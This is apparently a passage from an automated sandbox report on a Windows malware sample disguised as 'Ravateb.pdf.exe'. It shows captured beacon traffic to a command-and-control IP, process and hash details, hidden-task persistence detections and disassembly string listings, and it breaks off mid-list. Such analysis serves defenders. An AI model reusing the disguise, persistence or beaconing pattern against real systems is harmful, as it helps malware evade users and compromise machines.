          Authorization: Bearer QLJXCoiLjMhLcClEKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:01.175746918 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:01 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          14192.168.2.44973689.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:39:06.317131996 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer ELJNCoiLjYhLcClXKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:07.195157051 CET160INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:07 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          15192.168.2.44973789.46.233.239104437368C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          TimestampBytes transferredDirectionData
          Mar 12, 2025 17:39:12.409554958 CET521OUTGET /resource HTTP/1.1
          Host: 89.46.233.239
          Host: Connection: keep-alive
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Authorization: Bearer RLHGCoiLjZhLcClOKQVYFAFNVW0oDBQJTSkJEExQQ
          Mar 12, 2025 17:39:13.351949930 CET1236INHTTP/1.0 200 OK
          Date: Wed, 12 Mar 2025 16:39:13 GMT
          Server: 89.46.233.239
          Content-Type: text/html; charset=utf-8
          Content-Length: 2739
          Connection: close
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 72 69 67 68 74 46 75 74 75 72 65 20 44 69 67 69 74 61 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 34 66 34 66 34 3b [TRUNCATED]
          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>BrightFuture Digital</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } header { background-color: #2C3E50; color: #fff; padding: 1rem; text-align: center; } nav { display: flex; justify-content: center; background-color: #34495E; } nav a { color: white; padding: 1rem; text-decoration: none; } nav a:hover { background-color: #2C3E50; } main { padding: 2rem; margin: 2rem; background-color: #fff; border-radius: 5px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } [TRUNCATED]


          Statistics

          CPU Usage

          050100s020406080100

          Click to jump to process

          Memory Usage

          050100s0.0010203040MB

          Click to jump to process

          High Level Behavior Distribution

          • File
          • Registry
          • Network

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:12:37:08
          Start date:12/03/2025
          Path:C:\Users\user\Desktop\Ravateb.pdf.exe
          Wow64 process (32bit):false
          Commandline:"C:\Users\user\Desktop\Ravateb.pdf.exe"
          Imagebase:0x9c0000
          File size:82'944 bytes
          MD5 hash:E7D52EF521B8CD0B405575C185D64033
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1371627977.0000000000ED6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1374305706.000000001BE34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 00000000.00000002.1374192389.000000001BDEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          Reputation:low
          Has exited:true
          Show Windows behavior

          File Activities

          Show Windows behavior

          Section Activities

          Show Windows behavior

          Registry Activities

          Show Windows behavior

          COM Activities

          Show Windows behavior

          Mutex Activities

          Show Windows behavior

          Process Activities

          Show Windows behavior

          Thread Activities

          Show Windows behavior

          Memory Activities

          Show Windows behavior

          System Activities

          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
          Show Windows behavior

          Windows UI Activities

          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

          General

          Target ID:8
          Start time:12:37:29
          Start date:12/03/2025
          Path:C:\Users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe
          Wow64 process (32bit):false
          Commandline:C:\users\user\AppData\Roaming\Microsoft\WindowsObject\windowsObject.exe -time 6.9.2018
          Imagebase:0xf30000
          File size:22'016 bytes
          MD5 hash:2BC1C670A5C179E58F6C33C7469B9D98
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 46%, ReversingLabs
          Reputation:low
          Has exited:false
          Show Windows behavior

          File Activities

          Show Windows behavior

          Section Activities

          Show Windows behavior

          Registry Activities

          Show Windows behavior

          Mutex Activities

          Show Windows behavior

          Process Activities

          Show Windows behavior

          Thread Activities

          Show Windows behavior

          Memory Activities

          Show Windows behavior

          System Activities

          Show Windows behavior

          Windows UI Activities

          Network Activities

          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

          Disassembly

          Executed Functions

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$VUUU$gfff$KM_^
          • API String ID: 0-1712151901
          • Opcode ID: 4716125e4ddbef215dd6e32f7c196c8286de92493ef647ce7901a807b573b3b7
          • Instruction ID: c35582553e279f5190b191b702b72fe3909aa77c3ab407856397de90118c3da8
          • Opcode Fuzzy Hash: 4716125e4ddbef215dd6e32f7c196c8286de92493ef647ce7901a807b573b3b7
          • Instruction Fuzzy Hash: A813F571A0C95E8BEB5CDB6C985667477D2EB64B40F1482FED00EC32D6EE24AC41C762
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$J?=$VUUU$gfff
          • API String ID: 0-1065889911
          • Opcode ID: 6885a864d04620f8488a028798d1124c610e87587f539b13d22a0d0af3edc505
          • Instruction ID: e1a552b25c1357c5c2227a099f56591ad63b8b5c10ed486072d3548fc272c700
          • Opcode Fuzzy Hash: 6885a864d04620f8488a028798d1124c610e87587f539b13d22a0d0af3edc505
          • Instruction Fuzzy Hash: 6672C271A1891E8FEB5CDB2C9856A7477D2EB68740F5482FED00EC3296EE34AC41C752
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=$J?=$J?=$J?=$J?=$KM_^
          • API String ID: 0-690282634
          • Opcode ID: ada2e542992c45dc2ff005522639834e79b0d0532e6a7bc82c06a56bcd7a94de
          • Instruction ID: e26a779581832e7897abcec5f8e99b21f87fdc7cc924cd880c816528c6a93714
          • Opcode Fuzzy Hash: ada2e542992c45dc2ff005522639834e79b0d0532e6a7bc82c06a56bcd7a94de
          • Instruction Fuzzy Hash: E6122471A0C95E4BEB5CDB6898567747BD2EB64740F5482FED04AC32D3ED28AC42C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 0$gfff
          • API String ID: 0-4230242222
          • Opcode ID: 5d48c9e12c7cebcbdc7b3717f65207d5eb9c4d627d1f6c0c07a9935f55bdbc80
          • Instruction ID: 6ed204b843d16ae7f6c3093d466b9226e8cbebb1101d180e0531d7449b887aac
          • Opcode Fuzzy Hash: 5d48c9e12c7cebcbdc7b3717f65207d5eb9c4d627d1f6c0c07a9935f55bdbc80
          • Instruction Fuzzy Hash: 57424631A1C56E0FE75C9668A8062B53BD1EF85754F1482BAD04EC32DBFD28B816C3B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: &M_I
          • API String ID: 0-4001139138
          • Opcode ID: c2cea4d2909c16b7e53076156a102bd7a12a6e1a00c0bfeeef34aa019debe8e4
          • Instruction ID: ffe458d91d564e086bbe1d54432022f9839f5d6ebd071ad1be0dd7ad8790452c
          • Opcode Fuzzy Hash: c2cea4d2909c16b7e53076156a102bd7a12a6e1a00c0bfeeef34aa019debe8e4
          • Instruction Fuzzy Hash: 70022B22E0DA9E4BE719976CA8161B97F91EF4236470443FBD0C9C7097FC14A94AC3B5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: gfff
          • API String ID: 0-1553575800
          • Opcode ID: 614069d45d293a5d4b9a4d4c21773d65f880a8edc5980cff2b0dae25d736d6bb
          • Instruction ID: 584bce2579004d3ca389bde7c80c98b3109b163fb19428b9c7a57938715aa76b
          • Opcode Fuzzy Hash: 614069d45d293a5d4b9a4d4c21773d65f880a8edc5980cff2b0dae25d736d6bb
          • Instruction Fuzzy Hash: 34B14021F1C82E0BE75C926C58023B876C2EF84755F54C2B9D40EC72DBFD28B95682B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: gfff
          • API String ID: 0-1553575800
          • Opcode ID: d4a0dc2a1d65338dff5d55e8ffdb5120ce2b5139d20380ac1c928e1e0f7d3c7b
          • Instruction ID: e46c00e4db75bcd96e556e2636397a9296a67f9b3b4e1117e9f21c6630b93200
          • Opcode Fuzzy Hash: d4a0dc2a1d65338dff5d55e8ffdb5120ce2b5139d20380ac1c928e1e0f7d3c7b
          • Instruction Fuzzy Hash: ECB13E21F1C82E0BEB5C926C68023B876C2EF84755F5482BDD40EC71DBFD28B95692B1
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7471f50b5713b4a217f2be752e991649f4a6ce28dc52e70b1219f1ef3d3ecd56
          • Instruction ID: df85a1be44c2f7640e33b0798a86f0c65337b30b2924aad108d69026b4bb6dd5
          • Opcode Fuzzy Hash: 7471f50b5713b4a217f2be752e991649f4a6ce28dc52e70b1219f1ef3d3ecd56
          • Instruction Fuzzy Hash: F4F1A330918A4E8FEBA8DF28C8557E937E1FF54350F04826AE84DC7295DB38A945CB91
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e54f166ec809e9323c8bb7c3ac2a7644b0d6acf67b37fa40c88f4c08c8e7cbb4
          • Instruction ID: 2d3e2daabf91e47fe1525cdb3c8b74d38e6115f5420627610b9edfeeb905a6c0
          • Opcode Fuzzy Hash: e54f166ec809e9323c8bb7c3ac2a7644b0d6acf67b37fa40c88f4c08c8e7cbb4
          • Instruction Fuzzy Hash: 26E1D430908A8E8FEBA8DF68C8557E977E1FB54310F14826ED84DC3291EF78A941C791
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: V=$(V=$0V=$8V=$@Y=$HW=
          • API String ID: 0-1222742678
          • Opcode ID: de6432054c53a1e71847c730d25463096e82d7e74e3c2c3f10636b6e003144bf
          • Instruction ID: 6b63eabeb3bf5d83aa1d74d960ae3d673cb7c92d7be831350df6d7b926acc77f
          • Opcode Fuzzy Hash: de6432054c53a1e71847c730d25463096e82d7e74e3c2c3f10636b6e003144bf
          • Instruction Fuzzy Hash: F7A10561F1CD9E4BEB68D6A884555B57BD1EFA0350B1882FBC04AC31D7FD28A846C361
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: @Z=$Bu=$`n=$tM_L$wM_H
          • API String ID: 0-911148872
          • Opcode ID: 1c0cae5544c5a97add7c34ddd5efd789cc9f9db3ab093bc62cefe6216bf29d4c
          • Instruction ID: 3ad8296e500a2d88980ae86914da132326f2462413b3add15225acfaa4550421
          • Opcode Fuzzy Hash: 1c0cae5544c5a97add7c34ddd5efd789cc9f9db3ab093bc62cefe6216bf29d4c
          • Instruction Fuzzy Hash: 2CF1D271A1CE5E8FDB98EB58D4419B577E1FFA8300B1442EAD04AC3296EE24FC46C791
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: T=$8p=$i=
          • API String ID: 0-3631545301
          • Opcode ID: 88621f26c1c016f4aa15a4dbe7a97f5351500e8e08617526e82807c9010fdb99
          • Instruction ID: d72425c8f8223fea087f5242cb288b0f4f6d2b4106afe3f37d5c23e5c14df64f
          • Opcode Fuzzy Hash: 88621f26c1c016f4aa15a4dbe7a97f5351500e8e08617526e82807c9010fdb99
          • Instruction Fuzzy Hash: FF313961A1DE5E0FD369A6AC98410B57BE0EF6422070482FFD08EC31D7FC186C4AC3A1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: @`=$pc=
          • API String ID: 0-1361523942
          • Opcode ID: a77607b51693e380afd0b42677665f5b51885b710599f81d807a9ae172bd4d58
          • Instruction ID: cebe27fcf6d45c099dc3aa7ad170cc307a41d0fa04c3d828b6bfd1a8f90c10de
          • Opcode Fuzzy Hash: a77607b51693e380afd0b42677665f5b51885b710599f81d807a9ae172bd4d58
          • Instruction Fuzzy Hash: 9C911762A1CD9E8BEB58E77C84551B577E1EF94740B1486FBD04AC7187FD28A842C360
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: N_^$N_^
          • API String ID: 0-386383641
          • Opcode ID: 32bc7e4bfac4117c15f63abad089da0279aad42fbff699ad398952785e2563d9
          • Instruction ID: 77ce00cbf313b19faeeee78c56ac92b26b395d2b12fc882a11e2485178edf3f9
          • Opcode Fuzzy Hash: 32bc7e4bfac4117c15f63abad089da0279aad42fbff699ad398952785e2563d9
          • Instruction Fuzzy Hash: C451A34290EAEE0EF656A3B828610E83F919F4229870945FBC0D9CF0D7FC1C5996D276
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: 2e7207eb0ce09b58404fdaa369599983f27705921e356363e95782912686bd0f
          • Instruction ID: 62e832684f7774fecb267a06d79f06a92ed3a52f3c16b0b2d7a8b6219f8bbe4a
          • Opcode Fuzzy Hash: 2e7207eb0ce09b58404fdaa369599983f27705921e356363e95782912686bd0f
          • Instruction Fuzzy Hash: 8B42033190CB9D4FEBAA9B5888512B87FE1FF55750F0400FED449C7192EE25AC86C7A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: qM_H
          • API String ID: 0-3483471439
          • Opcode ID: bafbef9ed24ad70b67d9941d76cf0b550c2468d31cf60c81157713ff7942f273
          • Instruction ID: a36a3c69be03b303b2c8bc0ff549bcb2e60e468354ce95ad2ae193ab264fa8fa
          • Opcode Fuzzy Hash: bafbef9ed24ad70b67d9941d76cf0b550c2468d31cf60c81157713ff7942f273
          • Instruction Fuzzy Hash: 83128174A1896E8FEB99E79CD8857B977E1FF58700F5042B5D00DD3286EE386842C721
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: f232cebdbb60ed56adad7c688d59167b0d799f4c9c8d8b081a30d4621acab853
          • Instruction ID: eecdfdbabbcc5871bd1c828410ce94cc282563e4bd491ce87868ef5fd81236bf
          • Opcode Fuzzy Hash: f232cebdbb60ed56adad7c688d59167b0d799f4c9c8d8b081a30d4621acab853
          • Instruction Fuzzy Hash: 6B02F131A0DBAD4FEBAA975848512B87FE1EF55651F0801FBC04DC7193EE296C85C3A2
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: c18ee61f93a7219d728ec457e9b79d0b1fe84ebbbdbb1f2a3c6d37a059b9352f
          • Instruction ID: 4478273014f33846659821ffc0c209c20b15640efa395eca12f4352e67a1c8ba
          • Opcode Fuzzy Hash: c18ee61f93a7219d728ec457e9b79d0b1fe84ebbbdbb1f2a3c6d37a059b9352f
          • Instruction Fuzzy Hash: DDE1D42190DBAE4FEBA6976848616747FE1EF56751B1900FBC04CCB1D3EE18AC85C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374978336.00007FFC3DE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE80000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3de80000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: 8=
          • API String ID: 0-2352240893
          • Opcode ID: 6b70493a5a5487a1600acca1b6d67d2814dc79eaf26e53965cc5f166cccc9024
          • Instruction ID: 56802dab3d2e9c1cc76d3173cf3fd6ce581795d9dc577b3f7ddc916713ed8fc9
          • Opcode Fuzzy Hash: 6b70493a5a5487a1600acca1b6d67d2814dc79eaf26e53965cc5f166cccc9024
          • Instruction Fuzzy Hash: F9911431E0DB6E4FEBA9DB5888512787BE2EF95751F1400BAC04DD7183EE25AC85C362
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: `W=
          • API String ID: 0-2048444805
          • Opcode ID: ce8de83f29573d1061c65c422cd7e39ab293bcf3e2f586b23f02a8c41cbaf76d
          • Instruction ID: acd970df326926555069ce7d9dfd74bdba8244679761f56644b25a3e6f8eea07
          • Opcode Fuzzy Hash: ce8de83f29573d1061c65c422cd7e39ab293bcf3e2f586b23f02a8c41cbaf76d
          • Instruction Fuzzy Hash: 8E51CF6190D7D95FD75B877848AA1A13FF1DF6725070E41EBD089CB1A3E8185C0AC372
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: P9=
          • API String ID: 0-1482688260
          • Opcode ID: bc975a6bf0b215069bae3d0b83038ff8939d112a27d4c94f8f0eac704c2092aa
          • Instruction ID: b3d84e2eba0d00e7a148c9d8f333c99b3b01b3c68279a2a2a21506e02f4975f5
          • Opcode Fuzzy Hash: bc975a6bf0b215069bae3d0b83038ff8939d112a27d4c94f8f0eac704c2092aa
          • Instruction Fuzzy Hash: 27414B2291DDAE4FE76DA29858411B53BD1EFA5750B1541BBC48EC31C3FD186C42C3B1
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=
          • API String ID: 0-1970131801
          • Opcode ID: a613f4c64f7d55c74b030ac7ab0cf304d51fc315bdd720e9b1cbab6b3f57f098
          • Instruction ID: ffa3747066dd6c85f97e917a03c9e54eda6fe72f9bd127c14c0ff976d8b994cc
          • Opcode Fuzzy Hash: a613f4c64f7d55c74b030ac7ab0cf304d51fc315bdd720e9b1cbab6b3f57f098
          • Instruction Fuzzy Hash: FB41D371B0891E9BEE4C9B2C9855A7073D1EB74740B5181FDD00EC3296EE74EC85C691
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: `W=
          • API String ID: 0-2048444805
          • Opcode ID: de51c96a1c1a6499fac5ff36e01834ae5819ff7b07581f954d3cd69ee67be280
          • Instruction ID: 13146b23d62b25ec0ec5be720b16533b8068b0ae46081be1c3d52db4bea8bd6f
          • Opcode Fuzzy Hash: de51c96a1c1a6499fac5ff36e01834ae5819ff7b07581f954d3cd69ee67be280
          • Instruction Fuzzy Hash: D0315EA190E7CA5FD75B87B848A61A03FF1DF6725470A40EBC089CB1A3E8185C5AD772
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1374710113.00007FFC3DDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DDA0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ffc3dda0000_Ravateb.jbxd
          Similarity
          • API ID:
          • String ID: J?=
          • API String ID: 0-1970131801
          • Opcode ID: 0daf936709b1203e3e3e0aaaf20bf0d559526796975d7f730cc1b156eb9ed0b7
